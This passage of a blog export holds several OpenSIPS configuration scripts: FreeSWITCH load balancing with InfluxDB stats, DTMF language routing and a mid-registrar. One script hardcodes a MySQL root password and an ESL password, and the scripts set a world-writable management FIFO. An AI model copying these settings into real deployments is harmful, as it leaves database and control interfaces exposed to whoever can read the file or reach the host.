route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Relay forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); $dlg_val(start_ts) = $Ts; $dlg_val(start_tsm) = $Tsm; $dlg_val(pdd_pen) = \u0026#34;0\u0026#34;; t_on_reply(\u0026#34;invite_reply\u0026#34;); do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;501\u0026#34;, \u0026#34;Not Implemented\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } if (!load_balance(\u0026#34;2\u0026#34;, \u0026#34;call\u0026#34;)) { xlog(\u0026#34;no available destinations!\\n\u0026#34;); send_reply(\u0026#34;503\u0026#34;, \u0026#34;No available dsts\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } onreply_route [invite_reply] 
{ if ($rs == 180) { if ($Ts == $(dlg_val(start_ts){s.int})) { $var(diff_sec) = 0; $var(diff_usec) = $Tsm - $(dlg_val(start_tsm){s.int}); } else if ($Tsm \u0026gt; $(dlg_val(start_tsm){s.int})) { $var(diff_sec) = $Ts - $(dlg_val(start_ts){s.int}); $var(diff_usec) = $Tsm - $(dlg_val(start_tsm){s.int}); } else { $var(diff_sec) = $Ts - $(dlg_val(start_ts){s.int}) - 1; $var(diff_usec) = 1000000 + $Tsm - $(dlg_val(start_tsm){s.int}); } $var(diff_usec) = $var(diff_usec) + $dlg_val(pdd_pen); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;, $var(diff_sec), 0, $var(nsv)); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;, $var(diff_usec), 0, $var(nmsv)); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;, 1, 0); xlog(\u0026#34;XXXX: $var(diff_sec) s, $var(diff_usec) us | $var(nsv) | $var(nmsv)\\n\u0026#34;); } } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); } exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } if (!math_eval(\u0026#34;$dlg_val(pdd_pen) + 10000\u0026#34;, \u0026#34;$dlg_val(pdd_pen)\u0026#34;)) { xlog(\u0026#34;math eval error $rc\\n\u0026#34;); } cache_add(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;, 1, 0); if (t_check_status(\u0026#34;(5|6)[0-9][0-9]\u0026#34;) || (t_check_status(\u0026#34;408\u0026#34;) \u0026amp;\u0026amp; t_local_replied(\u0026#34;all\u0026#34;))) { xlog(\u0026#34;ERROR: FS GW error, status=$rs\\n\u0026#34;); if (!lb_next()) { xlog(\u0026#34;ERROR: all FS are down!\\n\u0026#34;); send_reply(\u0026#34;503\u0026#34;, \u0026#34;No available destination\u0026#34;); 
exit; } } xlog(\u0026#34;rerouting to $ru / $du\\n\u0026#34;); t_on_reply(\u0026#34;invite_reply\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } timer_route [dump_pdd, 1] { $var(out) = 0; $var(out_us) = 0; $var(tot) = 0; $var(result) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;, $var(out)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;, $var(out_us)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;, $var(tot)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;); if ($var(tot) \u0026gt; 0) { if (!math_eval(\u0026#34;($var(out) + ($var(out_us) / 1000000)) / $var(tot)\u0026#34;, \u0026#34;$var(result)\u0026#34;)) { xlog(\u0026#34;math eval error $rc\\n\u0026#34;); } route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;pdd\u0026#34;, \u0026#34;serverB\u0026#34;, $var(result)); } } #route [lb_route] #{ #\txlog(\u0026#34;foo: $(avp(lb_loads)[*])\\n\u0026#34;); #\troute(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;bal\u0026#34;, \u0026#34;serverA\u0026#34;, $(avp(lb_loads)[0])); #\tif ($(avp(lb_loads)[1]) != NULL) { #\troute(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;bal\u0026#34;, \u0026#34;serverB\u0026#34;, $(avp(lb_loads)[1])); #\t} #} route [store_influxdb] { $var(body) = $param(2) + \u0026#34;,host=\u0026#34; + $param(3) + \u0026#34; value=\u0026#34; + $param(4); xlog(\u0026#34;XXX posting: $var(body) ($param(1) / $param(2) / $param(4))\\n\u0026#34;); if (!rest_post(\u0026#34;http://localhost:8086/write?db=$param(1)\u0026#34;, 
\u0026#34;$var(body)\u0026#34;, , \u0026#34;$var(body)\u0026#34;)) { xlog(\u0026#34;ERR in rest_post!\\n\u0026#34;); exit; } } timer_route [dump_reply_stats, 1] { $var(nr) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;, $var(nr)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;); route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;neg\u0026#34;, \u0026#34;serverB\u0026#34;, $var(nr)); route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;rpl\u0026#34;, \u0026#34;serverB\u0026#34;, $stat(rcv_replies)); xlog(\u0026#34;XXX stats: $var(nr)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/fs-loadbalance/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for an explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 memdump=1 log_stderror=yes log_facility=LOG_LOCAL0 children=10 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen=udp:192.","title":"cluecon-fslb"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for an explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=4 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on reverse DNS on IPs */ auto_aliases=no listen = udp:10.0.0.10:5060 ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; 
modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direction of the sequential requests. if you enable this parameter, be sure to enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;cachedb_local.so\u0026#34; loadmodule \u0026#34;freeswitch.so\u0026#34; loadmodule \u0026#34;freeswitch_scripting.so\u0026#34; modparam(\u0026#34;freeswitch_scripting\u0026#34;, \u0026#34;fs_subscribe\u0026#34;, \u0026#34;fs://:ClueCon@10.0.0.246:8021/database?DTMF,CHANNEL_STATE,CHANNEL_ANSWER,HEARTBEAT\u0026#34;) loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;cfgutils.so\u0026#34; loadmodule \u0026#34;drouting.so\u0026#34; modparam(\u0026#34;drouting\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:liviusmysqlpassword@localhost/opensips\u0026#34;) loadmodule \u0026#34;event_route.so\u0026#34; loadmodule \u0026#34;json.so\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic # $param(1) - 1 if the R-URI IP:port should be rewritten route [goes_to_support] { if ($param(1) == 1) $var(flags) = \u0026#34;\u0026#34;; else $var(flags) = \u0026#34;C\u0026#34;; if 
(do_routing(\u0026#34;0\u0026#34;, \u0026#34;$var(flags)\u0026#34;)) return(1); return(-1); } route [FREESWITCH_XFER_BY_DTMF_LANG] { # this call has already been transferred if (cache_fetch(\u0026#34;local\u0026#34;, \u0026#34;DTMF-$json(body/Unique-ID)\u0026#34;, $var(_))) return; switch ($json(body/DTMF-Digit)) { case \u0026#34;1\u0026#34;: xlog(\u0026#34;transferring to English support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1001\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); break; case \u0026#34;2\u0026#34;: xlog(\u0026#34;transferring to Spanish support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1002\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); break; default: xlog(\u0026#34;DEFAULT: transferring to English support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1001\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); } xlog(\u0026#34;ran FS uuid_transfer, output: $var(output)\\n\u0026#34;); cache_store(\u0026#34;local\u0026#34;, \u0026#34;DTMF-$json(body/Unique-ID)\u0026#34;, \u0026#34;OK\u0026#34;, 600); } event_route [E_FREESWITCH] { fetch_event_params(\u0026#34;$var(event_name);$var(fs_box);$var(event_body)\u0026#34;); xlog(\u0026#34;FreeSWITCH event $var(event_name) from $var(fs_box), with $var(event_body)\\n\u0026#34;); $json(body) := $var(event_body); if ($var(event_name) == \u0026#34;DTMF\u0026#34;) { $rU = $json(body/Caller-Destination-Number); if (!$rU) { xlog(\u0026#34;SCRIPT:DTMF:ERR: missing body/Caller-Destination-Number field!\\n\u0026#34;); return; } if (route(goes_to_support, 0)) route(FREESWITCH_XFER_BY_DTMF_LANG); } } route { if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop 
ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential requests within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Relay forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if (!is_method(\u0026#34;INVITE\u0026#34;)) { sl_send_reply(\u0026#34;405\u0026#34;, \u0026#34;Method Not Allowed\u0026#34;); exit; } do_accounting(\u0026#34;log\u0026#34;); if (!is_myself(\u0026#34;$rd\u0026#34;)) { 
append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/dtmf-lan/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=4 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen = udp:10.","title":"freeswitch-dtmf-language"},{"content":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=4 log_stderror=yes log_facility=LOG_LOCAL0 children=4 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:10.0.0.3:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;mid_registrar.so\u0026#34; modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;mode\u0026#34;, 2) /* 0 = mirror / 1 = ct / 2 = AoR */ modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;outgoing_expires\u0026#34;, 7200) modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;insertion_mode\u0026#34;, 0) /* 0 = contact; 1 = path */ #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, 
\u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) #### UDP protocol loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic route{ if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # sequential requests within a dialog should # take the path determined by record-routing if (loose_route()) { if (is_method(\u0026#34;BYE\u0026#34;)) { # do accunting, even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } else if (is_method(\u0026#34;INVITE\u0026#34;)) { # even if in most of the cases is useless, do RR for # re-INVITEs alos, as some buggy clients do change route set # during the dialog. 
record_route(); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { # non loose-route, but stateful ACK; must be an ACK after # a 487 or e.g. 404 from upstream server t_relay(); exit; } else { # ACK without matching transaction -\u0026gt; # ignore and discard exit; } } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); } exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if (is_method(\u0026#34;REGISTER\u0026#34;)) { mid_registrar_save(\u0026#34;location\u0026#34;); switch ($retcode) { case 1: xlog(\u0026#34;forwarding REGISTER to main registrar ($$ci=$ci)\\n\u0026#34;); $ru = \u0026#34;sip:10.0.0.3:5070\u0026#34;; t_relay(); break; case 2: xlog(\u0026#34;absorbing REGISTER! ($$ci=$ci)\\n\u0026#34;); break; default: xlog(\u0026#34;failed to save registration! ($$ci=$ci)\\n\u0026#34;); } exit; } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { do_accounting(\u0026#34;log\u0026#34;); } if (!uri==myself) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # initial requests from main registrar, need to look them up! 
if (is_method(\u0026#34;INVITE|MESSAGE\u0026#34;) \u0026amp;\u0026amp; $si == \u0026#34;10.0.0.3\u0026#34; \u0026amp;\u0026amp; $sp == 5070) { xlog(\u0026#34;looking up $ru!\\n\u0026#34;); if (!mid_registrar_lookup(\u0026#34;location\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } t_relay(); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/mid-register/","summary":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=4 log_stderror=yes log_facility=LOG_LOCAL0 children=4 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:10.","title":"mid-registrar"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, 